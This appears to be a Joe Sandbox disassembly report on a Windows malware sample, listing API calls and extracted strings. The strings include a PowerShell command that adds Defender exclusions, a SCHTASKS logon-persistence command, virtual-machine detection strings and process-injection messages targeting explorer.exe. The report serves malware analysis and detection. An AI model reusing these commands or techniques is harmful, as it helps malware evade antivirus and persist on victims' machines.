                                                                • Opcode ID: b1db1362e8f7666fa33966f67872ea6d751e12cb592cb259104bd87ec26e7aa5
                                                                • Instruction ID: 8ed7b367cc64a1988262c409b1809d295c2f89c7b1afb82afd6ee6fc05bef853
                                                                • Opcode Fuzzy Hash: b1db1362e8f7666fa33966f67872ea6d751e12cb592cb259104bd87ec26e7aa5
                                                                • Instruction Fuzzy Hash: 3031FB3261DA8181DA60EB61F4503AFA761FBC6B84F504035EB8DC7B9ADF7CE9048B40
                                                                APIs
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0D2
                                                                  • Part of subcall function 00007FF6A54FAD14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FAD28
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0E3
                                                                  • Part of subcall function 00007FF6A54FACB4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACC8
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0F4
                                                                  • Part of subcall function 00007FF6A54FACE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACF8
                                                                  • Part of subcall function 00007FF6A54F3DF0: HeapFree.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E06
                                                                  • Part of subcall function 00007FF6A54F3DF0: GetLastError.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E10
                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A54FB334), ref: 00007FF6A54FB11B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 3458911817-0
                                                                • Opcode ID: a8e7ba172922adc6102ec0b169fffa80db1e84fa108491f87f32945443e031d2
                                                                • Instruction ID: 63b4cd99afc0b869ffd1f8447524758ea677e5d072f58b28cf2f8e24d4f970bf
                                                                • Opcode Fuzzy Hash: a8e7ba172922adc6102ec0b169fffa80db1e84fa108491f87f32945443e031d2
                                                                • Instruction Fuzzy Hash: 63516136A1A74286E720DF26E8915AD77A0FF4AF88F454135EA4DC3A96DF3CEC448740
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 1791019856-0
                                                                • Opcode ID: da8683dd3e0e58af869e83b33cf9f304577a22ec7fecedeb05b0833555dcf478
                                                                • Instruction ID: 273d355a3a6a7d6b730127787498b463ea89823ae8c8fb0623b5b467b97f27aa
                                                                • Opcode Fuzzy Hash: da8683dd3e0e58af869e83b33cf9f304577a22ec7fecedeb05b0833555dcf478
                                                                • Instruction Fuzzy Hash: 6B616D72A1A5929BEB24CF19E5802B973A1FF46F48F048135CB9ED3691DE3CE959C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                • Opcode ID: be82b1885dd7d7955bcd52d39be54fbf320cbda3d1e64b10f056933fab6e0425
                                                                • Instruction ID: bd8e02353cc8ee6960fc41e91ffb76c0cd9f968ca4100bcd53ddccf304fb9c1b
                                                                • Opcode Fuzzy Hash: be82b1885dd7d7955bcd52d39be54fbf320cbda3d1e64b10f056933fab6e0425
                                                                • Instruction Fuzzy Hash: 14212C7250D7808AF750CB25E46436BBBE0F792B48F540029E7C986AA9CF7DE448CF80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PARALLELS$VBOX$VMWARE
                                                                • API String ID: 0-3366580982
                                                                • Opcode ID: 2cc3addcba5be056e9715ab0f8dd42c8806a99efe45192e81d301b53f6a2213c
                                                                • Instruction ID: edaa118d85d699d058f4311164ed234c70efde96b4a7c792cb294880c1aea902
                                                                • Opcode Fuzzy Hash: 2cc3addcba5be056e9715ab0f8dd42c8806a99efe45192e81d301b53f6a2213c
                                                                • Instruction Fuzzy Hash: 05212C3650EF8581EA60CB04F44036AB7A4FB8AB88F500136EACD83B69DF3CD555CB40
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                • Opcode ID: 4eb7c83fbd0732192bab9355dfa31452ccf0d7db6d48fe87a0f4cc457e1c94cc
                                                                • Instruction ID: 16ca81b68ef37aff73cf66df85b5f06072996b2cc7e0e8d18df0caf947bac007
                                                                • Opcode Fuzzy Hash: 4eb7c83fbd0732192bab9355dfa31452ccf0d7db6d48fe87a0f4cc457e1c94cc
                                                                • Instruction Fuzzy Hash: 2F01A224B09A8189FB44DB5BB5401AAA7A0EF86FD4F588036DF4D83B69CE3CDD458340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CheckConnectionInternet
                                                                • String ID: http://www.google.com
                                                                • API String ID: 3847983778-1587574693
                                                                • Opcode ID: 2d63d6084c5bc36033196a9e802d62b989daa62fbe7d3658ad10ea2a4e957f56
                                                                • Instruction ID: 47b488fea2ba89a78c0c7281cbf46dbc4c732949764160ee825392327acd5d2e
                                                                • Opcode Fuzzy Hash: 2d63d6084c5bc36033196a9e802d62b989daa62fbe7d3658ad10ea2a4e957f56
                                                                • Instruction Fuzzy Hash: 9FD01725A1D4D29AE7A0D324A81133A2A50FB96B08F941172DACC82AA5DF5DDA54CB11
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue$InfoLocale
                                                                • String ID:
                                                                • API String ID: 673564084-0
                                                                • Opcode ID: 71927cf5d111a0085b870db45152aab8aa78d043065b6d4fcb7de9a32e9aeed0
                                                                • Instruction ID: c180fe5e8c9c6b8e090d95e7a31cf57e1698692ac74c8ba01e9e42b4671cfb45
                                                                • Opcode Fuzzy Hash: 71927cf5d111a0085b870db45152aab8aa78d043065b6d4fcb7de9a32e9aeed0
                                                                • Instruction Fuzzy Hash: 12317132A0A68656EB24DB25E4413BA73A1FF8AF84F448135DA4EC3285DF3CEC59C700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmp
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AdaptersInfo
                                                                • String ID:
                                                                • API String ID: 3177971545-0
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A550014B,?,00000000,00000092,?,?,00000000,?,00007FF6A54F1B19), ref: 00007FF6A54FF9FA
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystemValue
                                                                • String ID:
                                                                • API String ID: 3029459697-0
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • GetLocaleInfoW.KERNEL32(?,?,?,00007FF6A54FFCBE), ref: 00007FF6A54FFF4B
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocaleValue
                                                                • String ID:
                                                                • API String ID: 3796814847-0
                                                                APIs
                                                                  • Part of subcall function 00007FF6A54F38C4: GetLastError.KERNEL32 ref: 00007FF6A54F38D3
                                                                  • Part of subcall function 00007FF6A54F38C4: FlsGetValue.KERNEL32 ref: 00007FF6A54F38E8
                                                                  • Part of subcall function 00007FF6A54F38C4: SetLastError.KERNEL32 ref: 00007FF6A54F3973
                                                                • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6A5500107,?,00000000,00000092,?,?,00000000,?,00007FF6A54F1B19), ref: 00007FF6A54FFAAA
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystemValue
                                                                • String ID:
                                                                • API String ID: 3029459697-0
                                                                APIs
                                                                • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6A54F465F,?,?,?,?,?,?,?,?,00000000,00007FF6A54FEFAC), ref: 00007FF6A54F425F
                                                                Similarity
                                                                • API ID: EnumLocalesSystem
                                                                • String ID:
                                                                • API String ID: 2099609381-0
                                                                APIs
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyEnvironmentQueue::StructuredVariableWork$Heap$FreeInternetOpenProcess
                                                                • String ID: API_DOMAIN$STUB_ID$USER_ID$[+] Architectures are compatible !$[+] Source PE Image architecture : x64$[+] Source PE Image architecture : x86$[+] Subsystems are compatible.$[+] The source image doesn't have a relocation table.$[+] The source image has a relocation table.$[-] Architectures are not compatible !$[-] Subsystems are not compatible.$h
                                                                • API String ID: 1079869202-2761788501
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$TEMP$WinDrive-
                                                                • API String ID: 4146042529-4173729995
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$C:\Windows\System32\System-
                                                                • API String ID: 4146042529-412652669
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyHeapQueue::StructuredWork$FreeInternetOpenProcess
                                                                • String ID: C:\Windows\SysWOW64\explorer.exe$R.txt$STB/$[-] The injection has failed !$h
                                                                • API String ID: 2325589043-1079897378
                                                                Strings
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: " /SC ONLOGON /RL HIGHEST /F$" /TR "$.exe$C:\Windows\System32\System-$SCHTASKS /CREATE /TN "$System-$h
                                                                • API String ID: 4139908857-642182117
                                                                APIs
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CleanupStartupgetaddrinfo
                                                                • String ID:
                                                                • API String ID: 2905774039-0
                                                                APIs
                                                                Strings
                                                                • powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", xrefs: 00007FF6A54A8219
                                                                • h, xrefs: 00007FF6A54A8251
                                                                Similarity
                                                                • API ID: Handle$CloseProcess$CodeConcurrency::details::CreateEmptyExitObjectQueue::SingleStructuredWaitWork
                                                                • String ID: h$powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                                • API String ID: 4115279282-4234767237
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Internet$Open$CloseConcurrency::details::EmptyHandleQueue::StructuredWork
                                                                • String ID: ://$URL Checker
                                                                • API String ID: 556659790-376189231
                                                                • Opcode ID: 138a4f9c99596b6add8abca3ad47d818ff894f3662f0bfd93382009f04946c07
                                                                • Instruction ID: 72324875953b4f7d3dfdf4c098d251182ecde5497ba0551fe3c924085953faf9
                                                                • Opcode Fuzzy Hash: 138a4f9c99596b6add8abca3ad47d818ff894f3662f0bfd93382009f04946c07
                                                                • Instruction Fuzzy Hash: 6D61462151D98285EBA0DB11E4507AFBB60EBC2B54F401132F79E879EADF7CD945CB10
                                                                APIs
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateSize
                                                                • String ID:
                                                                • API String ID: 4148174661-0
                                                                • Opcode ID: 4fc6a91cce659f982cfa41dcbe280a0f34ebc84f7802506850a2c790e99faa42
                                                                • Instruction ID: fcf5944952b0cde4ff5463412d21f657b461c7f3c603927a4f83075effd7734e
                                                                • Opcode Fuzzy Hash: 4fc6a91cce659f982cfa41dcbe280a0f34ebc84f7802506850a2c790e99faa42
                                                                • Instruction Fuzzy Hash: 56310D3591DA4286D750DB25F85832AB770FBCABA5F500235EB9E82AE4CF7DD845CB00
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID: 0$0$0
                                                                • API String ID: 3215553584-3137946472
                                                                • Opcode ID: 78a9105b8d3eb675c28d1e7f2810b931d6c0b8dfaf285acd41b3411de57611db
                                                                • Instruction ID: 66fe58932ceae22e9f5fd8b0f77f5f26a0fdf32f37b8e75d6defcf13a1d4ec6d
                                                                • Opcode Fuzzy Hash: 78a9105b8d3eb675c28d1e7f2810b931d6c0b8dfaf285acd41b3411de57611db
                                                                • Instruction Fuzzy Hash: 60E1823290BA8699FB61CF2495942FD7B95DB53F84F548032CF8887796CE3EAC599300
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 3904239083-1405518554
                                                                • Opcode ID: 4dfde3383f7a4b369a959d9e2bd725c371989b896de6c47dd7e2a432758ade5a
                                                                • Instruction ID: d325ba540f7f8f237aa9b51cf4b1348576ecf1d49d1a2b075a9085b7bd9af45b
                                                                • Opcode Fuzzy Hash: 4dfde3383f7a4b369a959d9e2bd725c371989b896de6c47dd7e2a432758ade5a
                                                                • Instruction Fuzzy Hash: EF113C61E2FA4641DD84E72AE48567E6350EF87FC4F402035FA8E8B76BDE2CD8114744
                                                                APIs
                                                                Similarity
                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                • String ID:
                                                                • API String ID: 215268677-0
                                                                • Opcode ID: 5f2c0832ab6ece885dcda59b9d817a8b030af4e96d30603e9d99abf3769486a9
                                                                • Instruction ID: 551412b7019ee9f947025333a0656bceaee752b97bb52e700e7a55baf193a991
                                                                • Opcode Fuzzy Hash: 5f2c0832ab6ece885dcda59b9d817a8b030af4e96d30603e9d99abf3769486a9
                                                                • Instruction Fuzzy Hash: E451093261D78196E760CB25E46436FBBA0FB86B44F504135DA8D87AA9DF3CE849CF40
                                                                APIs
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00007FF6A54BEE66
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6A54BEE1A
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF6A54BEE56
                                                                Similarity
                                                                • API ID: Maklocwcsstd::_$Yarn
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 1194159078-3743323925
                                                                • Opcode ID: 5d4962b39fd07b777b164d7b9a713fa1bee80c8d123ce2088ff48aaf3eafe067
                                                                • Instruction ID: 4dde113ea00367c4eb6d4372bcc12a677072938473d2540617b5600fc5f1b8cc
                                                                • Opcode Fuzzy Hash: 5d4962b39fd07b777b164d7b9a713fa1bee80c8d123ce2088ff48aaf3eafe067
                                                                • Instruction Fuzzy Hash: A4215122A0AB4686EA10EB25E4413BD73B0EB96F84F498135EB4D83756DF3CF895C740
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 849930591-393685449
                                                                • Opcode ID: 5d6ddb46fddb62dcb6d5fccab5f44789c93ad0723b7c46ba309f4a08e2c6cabf
                                                                • Instruction ID: 45682bfe979ce3fcb2ad7df6b98e6829488a9de49f963794f051902fdbbe5268
                                                                • Opcode Fuzzy Hash: 5d6ddb46fddb62dcb6d5fccab5f44789c93ad0723b7c46ba309f4a08e2c6cabf
                                                                • Instruction Fuzzy Hash: 0FD15E32A097428AEB60DF6594403ED7BA0FB57B98F100135EE9D97B96DF38E991C700
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseHandleSleep$InternetOpentype_info::_name_internal_method
                                                                • String ID: M.txt$STB/
                                                                • API String ID: 15892541-1241599132
                                                                • Opcode ID: 76b51afb5aff4670bf812edd21bf24bcb82751ba93fb30ada2d883f34a336eb3
                                                                • Instruction ID: 37b3c5b97edde50ebbc7651e1d2e25cb35a76095b07038fea3a66a9f755ea572
                                                                • Opcode Fuzzy Hash: 76b51afb5aff4670bf812edd21bf24bcb82751ba93fb30ada2d883f34a336eb3
                                                                • Instruction Fuzzy Hash: A9711271A2E9C291EA61EB10E4512FEA365FFD6B40F801132E68EC79DADF2CD915C740
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID: f$p$p
                                                                • API String ID: 3215553584-1995029353
                                                                • Opcode ID: 0534396f76681fee6182308b4ef0558f8f0e6eb64ce6bcf6c9c2df8dad8d6b35
                                                                • Instruction ID: a511786cf14875b05a2d03c7b24368be62f88f92fe704fbc6ba2733439b4013d
                                                                • Opcode Fuzzy Hash: 0534396f76681fee6182308b4ef0558f8f0e6eb64ce6bcf6c9c2df8dad8d6b35
                                                                • Instruction Fuzzy Hash: 1E129162A0E14386FB28DA1DF5542BD7691FF42F54F944136EA89876C8DF3CED888B10
                                                                APIs
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: d65238d448fa04aa48ed10b74e8a9bd00d4b95505370c997ac1359f5591ceb68
                                                                • Instruction ID: 64ab0aefe5de1ac6c6737119da277221bb1f2ec2391963653a64355049a7a6f2
                                                                • Opcode Fuzzy Hash: d65238d448fa04aa48ed10b74e8a9bd00d4b95505370c997ac1359f5591ceb68
                                                                • Instruction Fuzzy Hash: 82C10322A0E78685E764CB5A90442BE3B91FF83F94F564131EA4E83791DF7DEC898301
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: CallCheckConnectionFunction0InternetMember
                                                                • String ID: #$M.txt$STB/$Waiting for Internet connection...
                                                                • API String ID: 917332565-3301742459
                                                                • Opcode ID: a529bee728ea5cab3a462fb131cfc8418009870eb95399fe24118a950620aa37
                                                                • Instruction ID: 2fe6a3c0ee9860ffbe1886f0cc0ecfa79d9258c6beebecf475187eeff8346085
                                                                • Opcode Fuzzy Hash: a529bee728ea5cab3a462fb131cfc8418009870eb95399fe24118a950620aa37
                                                                • Instruction Fuzzy Hash: E991006191E98291EA60EB15E4913FEA364FF96B44F801032E78DC79DAEF2CD905CB50
                                                                APIs
                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E2921
                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E292F
                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E2959
                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E29C7
                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A54E2AA3,?,?,00000000,00007FF6A54DF5AA,?,?,?,00007FF6A54DF085), ref: 00007FF6A54E29D3
                                                                Strings
                                                                Similarity
                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                • String ID: api-ms-
                                                                • API String ID: 2559590344-2084034818
                                                                • Opcode ID: 8850ed367ad2d2661b35613ed2634f1a61761a1f19c6c9ecbc9d02f3acf48630
                                                                • Instruction ID: 82f4314e213e43da8e703e17b746edd4e0a2c8fc18763422c3a8558c0f8c6b51
                                                                • Opcode Fuzzy Hash: 8850ed367ad2d2661b35613ed2634f1a61761a1f19c6c9ecbc9d02f3acf48630
                                                                • Instruction Fuzzy Hash: 5631AD21B1F74295EE55DB12A8006B96394FF47FA4F991535ED6D8B380EF3CE8448700
                                                                APIs
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00007FF6A54BED85
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF6A54BED67
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6A54BED26
                                                                Similarity
                                                                • API ID: Maklocstr
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 2987148671-35662545
                                                                • Opcode ID: 491fbdc8b27c632f473100e7b893b2012ae59e024739ff7ede600f62a4538336
                                                                • Instruction ID: cf174857236475d01ee88b88b507d355fece378100d6778682db975caec3631f
                                                                • Opcode Fuzzy Hash: 491fbdc8b27c632f473100e7b893b2012ae59e024739ff7ede600f62a4538336
                                                                • Instruction Fuzzy Hash: 7F214F26A0AB4585EB10EB21E4412AD77A5FB8AF80F498235DF4D83796DF3CE952C340
                                                                APIs
                                                                Similarity
                                                                • API ID: Value$ErrorLast
                                                                • String ID:
                                                                • API String ID: 2506987500-0
                                                                • Opcode ID: cce916f632552c727b67fcfdadb34d9da5b300b22d40e61ab8f623369a31ee8f
                                                                • Instruction ID: c37465fb698e31f6791aebd3875e94fc30da3b4b87c49ba355607ce7106d5f9e
                                                                • Opcode Fuzzy Hash: cce916f632552c727b67fcfdadb34d9da5b300b22d40e61ab8f623369a31ee8f
                                                                • Instruction Fuzzy Hash: 66215B24A0F28243FA6DE739A6455395242EF47FB0F154634E97E8B6D6DE6CAC094700
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                • String ID: CONOUT$
                                                                • API String ID: 3230265001-3130406586
                                                                • Opcode ID: 0aa2eead29613c64221a8d04dc2377f85f71da919e83e1575b9bdb53bd8f400c
                                                                • Instruction ID: bf0bf23b04239f3529e78d445633196476d6b8260c5fb632467d01df93e0b6ca
                                                                • Opcode Fuzzy Hash: 0aa2eead29613c64221a8d04dc2377f85f71da919e83e1575b9bdb53bd8f400c
                                                                • Instruction Fuzzy Hash: E0119D25B29A428AE750DB52E84432967A0FB8AFE9F000235EA5EC7794CF7CDC048740
                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: AddressProc$HandleModule
                                                                • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                • API String ID: 667068680-1047828073
                                                                • Opcode ID: 221e068b16366434f1d0638fdc9193794eda2090b996d2bddc54cd5b93809dff
                                                                • Instruction ID: 673b5f0a9099c65e807921b51b5935b81de8a2056343289bb40c2738deb95dbd
                                                                • Opcode Fuzzy Hash: 221e068b16366434f1d0638fdc9193794eda2090b996d2bddc54cd5b93809dff
                                                                • Instruction Fuzzy Hash: 09E07DACE2BA0795EA04EBA1A8554602364BF4AF65F444436C81E87364EF6C9995C360
                                                                APIs
